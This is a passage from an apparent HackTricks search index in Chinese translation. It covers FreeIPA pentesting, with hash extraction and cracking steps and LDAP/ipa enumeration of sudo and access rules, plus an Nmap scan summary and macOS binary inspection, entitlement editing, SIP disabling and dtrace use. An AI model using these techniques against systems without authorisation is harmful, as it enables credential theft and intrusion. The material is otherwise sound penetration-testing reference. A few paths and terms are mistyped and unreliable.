。","breadcrumbs":"FreeIPA Pentesting » 主机、用户和组","id":"2007","title":"主机、用户和组"},"2008":{"body":"IPA server 的 root 用户可以访问密码 hashes 。 用户的密码 hash 存储为 base64 在 “ userPassword ” attribute 中。这个 hash 可能是 SSHA512 (旧版本的 FreeIPA)或 PBKDF2_SHA256 。 如果系统与 AD 有 integration ,则密码的 Nthash 存储为 base64 在 “ ipaNTHash ” 中。 要破解这些 hashes: • 如果 freeIPA 与 AD 集成, ipaNTHash 很容易破解:你应该 decode base64 -> 重新编码为 ASCII hex -> John The Ripper 或 hashcat 可以帮助你快速破解 • 如果使用的是旧版本的 FreeIPA,则使用 SSHA512 :你应该解码 base64 -> 找到 SSHA512 hash -> John The Ripper 或 hashcat 可以帮助你破解 • 如果使用的是新版本的 FreeIPA,则使用 PBKDF2_SHA256 :你应该解码 base64 -> 找到 PBKDF2_SHA256 -> 它的 length 是 256 字节。John 可以处理 256 位(32 字节)-> SHA-265 用作伪随机函数,块大小为 32 字节 -> 你可以只使用我们的 PBKDF2_SHA256 hash 的前 256 位 -> John The Ripper 或 hashcat 可以帮助你破解 要提取 hashes,你需要在 FreeIPA server 中是 root ,在那里你可以使用工具 dbscan 来提取它们:","breadcrumbs":"FreeIPA Pentesting » Hashes","id":"2008","title":"Hashes"},"2009":{"body":"这些规则授予用户或主机对资源(主机、服务、服务组等)的特定权限。 bash # Enumerate using ldap\\nldapsearch -Y gssapi -b \\"cn=hbac,dc=domain_name,dc=local\\"\\n# Using ipa\\nipa hbacrule-find\\n# Show info of rule\\nipa hbacrule-show --all Sudo-Rules FreeIPA 通过 sudo-rules 实现对 sudo 权限 的集中控制。这些规则允许或限制在域内主机上使用 sudo 执行命令。攻击者可以通过检查这些规则集来识别适用的主机、用户和允许的命令。 bash # Enumerate using ldap\\nldapsearch -Y gssapi -b \\"cn=sudorules,cn=sudo,dc=domain_name,dc=local\\"\\n# Using ipa\\nipa sudorule-find\\n# Show info of rule\\nipa sudorule-show --all","breadcrumbs":"FreeIPA Pentesting » HBAC-Rules","id":"2009","title":"HBAC-Rules"},"201":{"body":"Reading time: 21 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » Nmap 摘要 (ESP)","id":"201","title":"Nmap 摘要 (ESP)"},"2010":{"body":"一个 角色 由各种 特权 组成,每个特权包含一组 权限 。这些角色可以分配给用户、用户 组 、 主机 、主机组和服务。例如,考虑 FreeIPA 中的默认“用户管理员”角色来说明这个结构。 角色 User Administrator 拥有以下特权: 用户管理员 组管理员 阶段用户管理员 使用以下命令可以枚举角色、特权和权限: bash # Using ldap\\nldapsearch -Y gssapi -b \\"cn=roles,cn=accounts,dc=westeros,dc=local\\"\\n# Using ipa binary\\nipa role-find\\nipa role-show --all\\nipa privilege-find\\nipa privilege-show --all\\nipa permission-find\\nipa permission-show --all","breadcrumbs":"FreeIPA Pentesting » 基于角色的访问控制","id":"2010","title":"基于角色的访问控制"},"2011":{"body":"在 https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e 中,您可以找到一个简单的示例,说明如何滥用某些权限来妥协域。","breadcrumbs":"FreeIPA Pentesting » 攻击场景示例","id":"2011","title":"攻击场景示例"},"2012":{"body":"https://github.com/Orange-Cyberdefense/LinikatzV2 https://github.com/CiscoCXSecurity/linikatz","breadcrumbs":"FreeIPA Pentesting » Linikatz/LinikatzV2","id":"2012","title":"Linikatz/LinikatzV2"},"2013":{"body":"","breadcrumbs":"FreeIPA Pentesting » 权限提升","id":"2013","title":"权限提升"},"2014":{"body":"warning 如果您可以 创建一个名为 root 的新用户 ,您可以冒充他并能够 以 root 身份 SSH 进入任何机器。 这已经被修补。 您可以在 https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b 中查看详细说明。","breadcrumbs":"FreeIPA Pentesting » root 用户创建","id":"2014","title":"root 用户创建"},"2015":{"body":"https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1 https://www.youtube.com/watch?v=9dOu-7BTwPQ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"FreeIPA Pentesting » 参考文献","id":"2015","title":"参考文献"},"2016":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS 安全与权限提升","id":"2016","title":"macOS 安全与权限提升"},"2017":{"body":"如果你对 macOS 不熟悉,你应该开始学习 macOS 的基础知识: 特殊的 macOS 文件与权限: macOS Files, Folders, Binaries & Memory 常见的 macOS 用户 macOS Users & External Accounts AppleFS macOS AppleFS 内核 的 架构 macOS Kernel & System Extensions 常见的 macOS n 网络服务与协议 macOS Network Services & Protocols 开源 macOS: https://opensource.apple.com/ 要下载 tar.gz,将 URL 更改为 https://opensource.apple.com/ source /dyld/ 到 https://opensource.apple.com/ tarballs /dyld/ dyld-852.2.tar.gz","breadcrumbs":"macOS Security & Privilege Escalation » 基础 MacOS","id":"2017","title":"基础 MacOS"},"2018":{"body":"在公司中, macOS 系统很可能会被 MDM 管理 。因此,从攻击者的角度来看,了解 其工作原理 是很有趣的: macOS MDM","breadcrumbs":"macOS Security & Privilege Escalation » MacOS MDM","id":"2018","title":"MacOS MDM"},"2019":{"body":"macOS Apps - Inspecting, debugging and Fuzzing","breadcrumbs":"macOS Security & Privilege Escalation » MacOS - 检查、调试和模糊测试","id":"2019","title":"MacOS - 检查、调试和模糊测试"},"202":{"body":"","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 参数","id":"202","title":"参数"},"2020":{"body":"macOS Security Protections","breadcrumbs":"macOS Security & Privilege Escalation » MacOS 安全保护","id":"2020","title":"MacOS 安全保护"},"2021":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » 攻击面","id":"2021","title":"攻击面"},"2022":{"body":"如果 以 root 身份运行的进程写入 一个可以被用户控制的文件,用户可能会利用这一点来 提升权限 。 这可能发生在以下情况下: 使用的文件已经由用户创建(由用户拥有) 使用的文件因组而可被用户写入 使用的文件位于用户拥有的目录中(用户可以创建该文件) 使用的文件位于 root 拥有的目录中,但用户因组而具有写入权限(用户可以创建该文件) 能够 创建一个将被 root 使用的文件 ,允许用户 利用其内容 ,甚至创建 符号链接/硬链接 指向另一个地方。 对于这种漏洞,不要忘记 检查易受攻击的 .pkg 安装程序 : macOS Installers Abuse","breadcrumbs":"macOS Security & Privilege Escalation » 文件权限","id":"2022","title":"文件权限"},"2023":{"body":"通过文件扩展名注册的奇怪应用程序可能会被滥用,不同的应用程序可以注册以打开特定协议 macOS File Extension & URL scheme app handlers","breadcrumbs":"macOS Security & Privilege Escalation » 文件扩展名与 URL 方案应用处理程序","id":"2023","title":"文件扩展名与 URL 方案应用处理程序"},"2024":{"body":"在 macOS 中, 应用程序和二进制文件可以拥有 访问文件夹或设置的权限,使其比其他应用程序更具特权。 因此,想要成功攻陷 macOS 机器的攻击者需要 提升其 TCC 权限 (甚至 绕过 SIP ,具体取决于其需求)。 这些权限通常以 应用程序签名的权利 形式授予,或者应用程序可能请求某些访问权限,在 用户批准后 ,它们可以在 TCC 数据库 中找到。进程获得这些权限的另一种方式是成为具有这些 权限 的进程的 子进程 ,因为它们通常是 继承的 。 请访问这些链接以找到不同的方式 在 TCC 中提升权限 ,以 绕过 TCC 和过去 如何绕过 SIP 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS TCC / SIP 权限提升","id":"2024","title":"macOS TCC / SIP 权限提升"},"2025":{"body":"当然,从红队的角度来看,你也应该对提升到 root 感兴趣。查看以下帖子以获取一些提示: macOS Privilege Escalation","breadcrumbs":"macOS Security & Privilege Escalation » macOS 传统权限提升","id":"2025","title":"macOS 传统权限提升"},"2026":{"body":"https://github.com/usnistgov/macos_security","breadcrumbs":"macOS Security & Privilege Escalation » macOS 合规性","id":"2026","title":"macOS 合规性"},"2027":{"body":"OS X 事件响应:脚本和分析 https://taomm.org/vol1/analysis.html https://github.com/NicolasGrimonpont/Cheatsheet https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ https://www.youtube.com/watch?v=vMGiplQtjTY tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » 参考文献","id":"2027","title":"参考文献"},"2028":{"body":"Reading time: 32 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » macOS 应用 - 检查、调试和模糊测试","id":"2028","title":"macOS 应用 - 检查、调试和模糊测试"},"2029":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 静态分析","id":"2029","title":"静态分析"},"203":{"body":",: 直接指示 IP -iL : list_IPs -iR : 随机 IP 的数量,可以使用 --exclude 或 --excludefile 排除可能的 IP。","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 要扫描的 IP","id":"203","title":"要扫描的 IP"},"2030":{"body":"bash otool -L /bin/ls #List dynamically linked libraries\\notool -tv /bin/ps #Decompile application bash objdump -m --dylibs-used /bin/ls #List dynamically linked libraries\\nobjdump -m -h /bin/ls # Get headers information\\nobjdump -m --syms /bin/ls # Check if the symbol table exists to get function names\\nobjdump -m --full-contents /bin/ls # Dump every section\\nobjdump -d /bin/ls # Dissasemble the binary\\nobjdump --disassemble-symbols=_hello --x86-asm-syntax=intel toolsdemo #Disassemble a function using intel flavour bash nm -m ./tccd # List of symbols","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » otool & objdump & nm","id":"2030","title":"otool & objdump & nm"},"2031":{"body":"您可以 从这里下载 disarm 。 bash ARCH=arm64e disarm -c -i -I --signature /path/bin # Get bin info and signature\\nARCH=arm64e disarm -c -l /path/bin # Get binary sections\\nARCH=arm64e disarm -c -L /path/bin # Get binary commands (dependencies included)\\nARCH=arm64e disarm -c -S /path/bin # Get symbols (func names, strings...)\\nARCH=arm64e disarm -c -d /path/bin # Get disasembled\\njtool2 -d __DATA.__const myipc_server | grep MIG # Get MIG info 您可以 在这里下载 jtool2 或使用 brew 安装它。 bash # Install\\nbrew install --cask jtool2 jtool2 -l /bin/ls # Get commands (headers)\\njtool2 -L /bin/ls # Get libraries\\njtool2 -S /bin/ls # Get symbol info\\njtool2 -d /bin/ls # Dump binary\\njtool2 -D /bin/ls # Decompile binary # Get signature information\\nARCH=x86_64 jtool2 --sig /System/Applications/Automator.app/Contents/MacOS/Automator # Get MIG information\\njtool2 -d __DATA.__const myipc_server | grep MIG [!CAUTION] > jtool 已被 disarm 取代","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » jtool2 & Disarm","id":"2031","title":"jtool2 & Disarm"},"2032":{"body":"[!TIP] > Codesign 可以在 macOS 中找到,而 ldid 可以在 iOS 中找到 bash # Get signer\\ncodesign -vv -d /bin/ls 2>&1 | grep -E \\"Authority|TeamIdentifier\\" # Check if the app’s contents have been modified\\ncodesign --verify --verbose /Applications/Safari.app # Get entitlements from the binary\\ncodesign -d --entitlements :- /System/Applications/Automator.app # Check the TCC perms # Check if the signature is valid\\nspctl --assess --verbose /Applications/Safari.app # Sign a binary\\ncodesign -s toolsdemo # Get signature info\\nldid -h # Get entitlements\\nldid -e # Change entilements\\n## /tmp/entl.xml is a XML file with the new entitlements to add\\nldid -S/tmp/entl.xml ","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 代码签名 / ldid","id":"2032","title":"代码签名 / ldid"},"2033":{"body":"SuspiciousPackage 是一个有用的工具,可以在安装之前检查 .pkg 文件(安装程序)并查看其内容。 这些安装程序通常具有 preinstall 和 postinstall bash 脚本,恶意软件作者通常利用这些脚本来 持久化 恶意软件 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » SuspiciousPackage","id":"2033","title":"SuspiciousPackage"},"2034":{"body":"此工具允许 挂载 Apple 磁盘映像 ( .dmg ) 文件,以便在运行任何内容之前进行检查: bash hdiutil attach ~/Downloads/Firefox\\\\ 58.0.2.dmg 它将被挂载在 /Volumes","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » hdiutil","id":"2034","title":"hdiutil"},"2035":{"body":"检查高熵 检查字符串(几乎没有可理解的字符串,已打包) MacOS 的 UPX 打包器生成一个名为 \\"__XHDR\\" 的部分","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 打包的二进制文件","id":"2035","title":"打包的二进制文件"},"2036":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 静态 Objective-C 分析","id":"2036","title":"静态 Objective-C 分析"},"2037":{"body":"caution 请注意,用 Objective-C 编写的程序在编译成 Mach-O 二进制文件 时 保留 其类声明。这些类声明 包括 : 定义的接口 接口方法 接口实例变量 定义的协议 请注意,这些名称可能会被混淆,以使二进制文件的逆向工程更加困难。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 元数据","id":"2037","title":"元数据"},"2038":{"body":"当在使用 Objective-C 的二进制文件中调用一个函数时,编译后的代码不会直接调用该函数,而是会调用 objc_msgSend 。这将调用最终的函数: 该函数期望的参数为: 第一个参数 ( self ) 是 \\"指向 接收消息的类实例的指针 \\"。更简单地说,它是正在调用该方法的对象。如果该方法是类方法,则这是类对象的一个实例(作为整体),而对于实例方法,self 将指向类的一个实例化对象。 第二个参数 ( op ) 是 \\"处理消息的方法的选择器\\"。同样,更简单地说,这只是 方法的名称 。 剩余的参数是方法所需的任何 值 (op)。 请参见如何在此页面中 使用 lldb 在 ARM64 中轻松获取此信息 : Introduction to ARM64v8 x64: 参数 寄存器 (对于) objc_msgSend 第一个参数 rdi self: 正在调用该方法的对象 第二个参数 rsi op: 方法的名称 第三个参数 rdx 方法的第一个参数 第四个参数 rcx 方法的第二个参数 第五个参数 r8 方法的第三个参数 第六个参数 r9 方法的第四个参数 第七个及以上参数 rsp+(在栈上) 方法的第五个及以上参数","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 函数调用","id":"2038","title":"函数调用"},"2039":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 转储 ObjectiveC 元数据","id":"2039","title":"转储 ObjectiveC 元数据"},"204":{"body":"默认情况下,Nmap 启动一个发现阶段,包括:-PA80 -PS443 -PE -PP -sL : 这不是侵入性的,它列出目标并发出 DNS 请求以解析名称。它有助于了解例如 www.prueba.es/24 所有 IP 是否都是我们的目标。 -Pn : 不 ping 。如果你知道它们都是活动的,这很有用(如果不是,你可能会浪费很多时间,但这个选项也会产生错误的负面结果,表示它们不活跃),它会阻止发现阶段。 -sn : 不端口扫描 。完成侦察阶段后,不扫描端口。它相对隐蔽,并允许小规模网络扫描。具有权限时,它向 80 发送 ACK (-PA),向 443 发送 SYN(-PS) 和回声请求以及时间戳请求,若没有权限则始终完成连接。如果目标是网络,它仅使用 ARP(-PR)。如果与其他选项一起使用,则仅丢弃其他选项的数据包。 -PR : Ping ARP 。在分析我们网络中的计算机时默认使用,它比使用 ping 更快。如果不想使用 ARP 数据包,请使用 --send-ip。 -PS : 向端口发送 SYN 数据包,如果回应 SYN/ACK 则表示开放(回应 RST 以避免结束连接),如果回应 RST 则表示关闭,如果没有回应则表示不可达。如果没有权限,则自动使用完全连接。如果未给出端口,则默认为 80。 -PA : 与前一个相似,但使用 ACK,结合使用可以获得更好的结果。 -PU : 目标相反,发送到预期关闭的端口。一些防火墙仅检查 TCP 连接。如果关闭,则回应端口不可达,如果回应其他 ICMP 或没有回应,则视为目标不可达。 -PE, -PP, -PM : ICMP PINGS: 回声回复、时间戳和地址掩码。它们被发出以确定目标是否活跃。 -PY : 默认向 80 发送 SCTP INIT 探测,回应可以是 INIT-ACK(开放)、ABORT(关闭)或无回应或 ICMP 不可达(不活跃)。 -PO : 在报头中指示协议,默认 1(ICMP)、2(IGMP)和 4(封装 IP)。对于 ICMP、IGMP、TCP(6)和 UDP(17)协议,发送协议报头,对于其他协议仅发送 IP 报头。这样做的目的是由于报头的畸形,回应协议不可达或同协议的回应,以了解其是否活跃。 -n : 不使用 DNS -R : 始终使用 DNS","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 设备发现","id":"204","title":"设备发现"},"2040":{"body":"Dynadump 是一个用于类转储 Objective-C 二进制文件的工具。GitHub 指定了 dylibs,但这也适用于可执行文件。 bash ./dynadump dump /path/to/bin 在撰写时,这是 目前效果最好的 。 常规工具 bash nm --dyldinfo-only /path/to/bin\\notool -ov /path/to/bin\\nobjdump --macho --objc-meta-data /path/to/bin class-dump class-dump 是一个原始工具,用于生成 ObjetiveC 格式代码中的类、类别和协议的声明。 它已经很旧且未维护,因此可能无法正常工作。 ICDump iCDump 是一个现代的跨平台 Objective-C 类转储工具。与现有工具相比,iCDump 可以独立于 Apple 生态系统运行,并且它提供了 Python 绑定。 python import icdump\\nmetadata = icdump.objc.parse(\\"/path/to/bin\\") print(metadata.to_decl())","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Dynadump","id":"2040","title":"Dynadump"},"2041":{"body":"对于 Swift 二进制文件,由于与 Objective-C 的兼容性,有时可以使用 class-dump 提取声明,但并不总是如此。 使用 jtool -l 或 otool -l 命令行,可以找到多个以 __swift5 前缀开头的部分: bash jtool2 -l /Applications/Stocks.app/Contents/MacOS/Stocks\\nLC 00: LC_SEGMENT_64 Mem: 0x000000000-0x100000000 __PAGEZERO\\nLC 01: LC_SEGMENT_64 Mem: 0x100000000-0x100028000 __TEXT\\n[...]\\nMem: 0x100026630-0x100026d54 __TEXT.__swift5_typeref\\nMem: 0x100026d60-0x100027061 __TEXT.__swift5_reflstr\\nMem: 0x100027064-0x1000274cc __TEXT.__swift5_fieldmd\\nMem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture\\n[...] 您可以在 此博客文章中找到有关这些部分存储的信息 。 此外, Swift 二进制文件可能包含符号 (例如,库需要存储符号以便可以调用其函数)。 符号通常以丑陋的方式包含有关函数名称和属性的信息 ,因此它们非常有用,并且有“ 去混淆器 ”可以获取原始名称: bash # Ghidra plugin\\nhttps://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py # Swift cli\\nswift demangle","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 静态 Swift 分析","id":"2041","title":"静态 Swift 分析"},"2042":{"body":"warning 请注意,为了调试二进制文件, 需要禁用 SIP (csrutil disable 或 csrutil enable --without debug),或者将二进制文件复制到临时文件夹并 移除签名 (使用 codesign --remove-signature ),或者允许调试该二进制文件(您可以使用 this script )。 warning 请注意,为了在 macOS 上 插桩系统二进制文件 (例如 cloudconfigurationd), 必须禁用 SIP (仅移除签名是无效的)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 动态分析","id":"2042","title":"动态分析"},"2043":{"body":"macOS 暴露了一些有趣的 API,提供有关进程的信息: proc_info:这是主要的 API,提供有关每个进程的大量信息。您需要是 root 用户才能获取其他进程的信息,但不需要特殊的权限或 mach 端口。 libsysmon.dylib:它允许通过 XPC 暴露的函数获取有关进程的信息,但需要具有 com.apple.sysmond.client 权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » APIs","id":"2043","title":"APIs"},"2044":{"body":"Stackshotting 是一种用于捕获进程状态的技术,包括所有运行线程的调用栈。这对于调试、性能分析以及理解系统在特定时间点的行为特别有用。在 iOS 和 macOS 上,可以使用多种工具和方法进行 stackshotting,例如工具 sample 和 spindump 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Stackshot & microstackshots","id":"2044","title":"Stackshot & microstackshots"},"2045":{"body":"该工具(/usr/bini/ysdiagnose)基本上从您的计算机收集大量信息,执行数十个不同的命令,例如 ps、zprint... 它必须以 root 身份运行,守护进程 /usr/libexec/sysdiagnosed 具有非常有趣的权限,例如 com.apple.system-task-ports 和 get-task-allow。 其 plist 位于 /System/Library/LaunchDaemons/com.apple.sysdiagnose.plist,声明了 3 个 MachServices: com.apple.sysdiagnose.CacheDelete:删除 /var/rmp 中的旧档案 com.apple.sysdiagnose.kernel.ipc:特殊端口 23(内核) com.apple.sysdiagnose.service.xpc:通过 Libsysdiagnose Obj-C 类的用户模式接口。可以在字典中传递三个参数(compress、display、run)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Sysdiagnose","id":"2045","title":"Sysdiagnose"},"2046":{"body":"MacOS 生成大量日志,这在运行应用程序时尝试理解 它在做什么 时非常有用。 此外,有一些日志将包含标签 以 隐藏 某些 用户 或 计算机 的 可识别 信息。然而,可以 安装证书以披露此信息 。请按照 这里 的说明进行操作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 统一日志","id":"2046","title":"统一日志"},"2047":{"body":"左侧面板 在 Hopper 的左侧面板中,可以看到二进制文件的符号( Labels )、过程和函数的列表( Proc )以及字符串( Str )。这些并不是所有字符串,而是定义在 Mac-O 文件的多个部分中的字符串(如 cstring 或 objc_methname)。 中间面板 在中间面板中,您可以看到 反汇编代码 。您可以查看 原始 反汇编、 图形 、 反编译 和 二进制 ,通过点击相应的图标: 右键单击代码对象,您可以查看 对该对象的引用 或甚至更改其名称(这在反编译的伪代码中无效): 此外,在 中间下方,您可以编写 Python 命令 。 右侧面板 在右侧面板中,您可以看到有趣的信息,例如 导航历史 (以便您知道如何到达当前情况)、 调用图 ,您可以看到所有 调用此函数的函数 以及所有 此函数调用的函数 ,以及 局部变量 信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Hopper","id":"2047","title":"Hopper"},"2048":{"body":"它允许用户以极低的 级别 访问应用程序,并提供了一种方法,让用户 跟踪 程序 ,甚至更改其执行流程。Dtrace 使用 探针 ,这些探针 分布在内核中 ,位于系统调用的开始和结束位置。 DTrace 使用 dtrace_probe_create 函数为每个系统调用创建一个探针。这些探针可以在 每个系统调用的入口和出口点 触发。与 DTrace 的交互通过 /dev/dtrace 进行,该接口仅对 root 用户可用。 tip 要在不完全禁用 SIP 保护的情况下启用 Dtrace,您可以在恢复模式下执行:csrutil enable --without dtrace 您还可以使用您 编译的 dtrace 或 dtruss 二进制文件。 可以通过以下命令获取 dtrace 的可用探针: bash dtrace -l | head\\nID PROVIDER MODULE FUNCTION NAME\\n1 dtrace BEGIN\\n2 dtrace END\\n3 dtrace ERROR\\n43 profile profile-97\\n44 profile profile-199 探针名称由四个部分组成:提供者、模块、函数和名称(fbt:mach_kernel:ptrace:entry)。如果您未指定名称的某个部分,Dtrace 将将该部分应用为通配符。 要配置 DTrace 以激活探针并指定触发时要执行的操作,我们需要使用 D 语言。 更详细的解释和更多示例可以在 https://illumos.org/books/dtrace/chp-intro.html 中找到。 示例 运行 man -k dtrace 列出 可用的 DTrace 脚本 。示例:sudo dtruss -n binary bash #Count the number of syscalls of each running process\\nsudo dtrace -n \'syscall:::entry {@[execname] = count()}\' 脚本 bash syscall:::entry\\n/pid == $1/\\n{\\n} #Log every syscall of a PID\\nsudo dtrace -s script.d 1234 bash syscall::open:entry\\n{\\nprintf(\\"%s(%s)\\", probefunc, copyinstr(arg0));\\n}\\nsyscall::close:entry\\n{\\nprintf(\\"%s(%d)\\\\n\\", probefunc, arg0);\\n} #Log files opened and closed by a process\\nsudo dtrace -s b.d -c \\"cat /etc/hosts\\" bash syscall:::entry\\n{\\n;\\n}\\nsyscall:::return\\n{\\nprintf(\\"=%d\\\\n\\", arg1);\\n} #Log sys calls with values\\nsudo dtrace -s syscalls_info.d -c \\"cat /etc/hosts\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » dtrace","id":"2048","title":"dtrace"},"2049":{"body":"bash dtruss -c ls #Get syscalls of ls\\ndtruss -c -p 1000 #get syscalls of PID 1000","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » dtruss","id":"2049","title":"dtruss"},"205":{"body":"-sS : 不完成连接,因此不会留下痕迹,如果可以使用,非常好。(需要权限)这是默认使用的。 -sT : 完成连接,因此会留下痕迹,但可以确保使用。默认情况下没有权限。 -sU : 较慢,针对 UDP。主要是:DNS(53)、SNMP(161,162)、DHCP(67 和 68),(-sU53,161,162,67,68):开放(回应)、关闭(端口不可达)、过滤(其他 ICMP)、开放/过滤(无回应)。在开放/过滤的情况下,-sV 发送大量请求以检测 nmap 支持的任何版本,并可以检测真实状态。这样会大大增加时间。 -sY : SCTP 协议未能建立连接,因此没有日志,工作方式类似于 -PY -sN,-sX,-sF: Null、Fin、Xmas,可以穿透某些防火墙并提取信息。它们基于标准合规机器应对所有没有 SYN、RST 或 ACK 的请求回应 RST 的事实,延迟:开放/过滤(无回应)、关闭(RST)、过滤(ICMP 不可达)。在 Windows、Cisco、BSDI 和 OS/400 上不可靠。在 Unix 上是可以的。 -sM : Maimon 扫描:发送 FIN 和 ACK 标志,适用于 BSD,目前将所有返回为关闭。 -sA, sW : ACK 和窗口,用于检测防火墙,以了解端口是否被过滤。-sW 确实区分开放/关闭,因为开放的回应具有不同的窗口值:开放(RST 窗口不为 0)、关闭(RST 窗口 = 0)、过滤(ICMP 不可达或无回应)。并非所有计算机都以这种方式工作,因此如果全部关闭,则不工作;如果有几个开放,则工作正常;如果有很多开放和少量关闭,则工作方式相反。 -sI: Idle 扫描。对于存在活动防火墙但我们知道它不过滤特定 IP 的情况(或当我们只是想要匿名时),可以使用僵尸扫描器(适用于所有端口),要查找可能的僵尸,可以使用脚本 ipidseq 或利用辅助扫描器 auxiliary/scanner/ip/ipidseq。该扫描器基于 IP 数据包的 IPID 编号。 --badsum: 发送错误的和,计算机会丢弃数据包,但防火墙可能会回应某些内容,用于检测防火墙。 -sZ: \\"奇怪\\"的 SCTP 扫描器,当发送带有 cookie 回声片段的探测时,如果开放则应被丢弃,如果关闭则应回应 ABORT。它可以穿透 init 无法穿透的防火墙,坏处是它无法区分过滤和开放。 -sO: 协议 IP 扫描。发送错误和空报头,有时甚至无法区分协议。如果 ICMP 不可达协议到达,则表示关闭;如果不可达端口到达,则表示开放;如果到达其他错误,则表示过滤;如果没有到达,则表示开放|过滤。 -b : FTPhost--> 用于从另一台主机扫描主机,通过连接另一台机器的 ftp 并请求其将文件发送到要从另一台机器扫描的端口,根据回应我们将知道它们是否开放。 [:@][:]几乎所有 ftps 服务器不再允许这样做,因此实用性不大。","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 端口扫描技术","id":"205","title":"端口扫描技术"},"2050":{"body":"它是一个内核跟踪工具。文档代码可以在 /usr/share/misc/trace.codes 中找到。 像 latency、sc_usage、fs_usage 和 trace 这样的工具在内部使用它。 要与 kdebug 进行接口,使用 sysctl 通过 kern.kdebug 命名空间,使用的 MIB 可以在 sys/sysctl.h 中找到,相关函数在 bsd/kern/kdebug.c 中实现。 要与 kdebug 